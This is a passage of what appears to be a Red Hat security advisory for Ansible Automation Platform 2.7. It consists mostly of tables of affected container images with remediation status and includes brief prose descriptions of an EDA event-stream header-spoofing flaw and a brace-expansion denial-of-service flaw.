| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in brace-expansion. An attacker can exploit a vulnerability in the `expand()` function by providing a specially crafted string. This string, containing consecutive non-expanding brace groups, can trigger exponential-time complexity, leading to significant CPU consumption and event-loop blocking. This can result in a Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
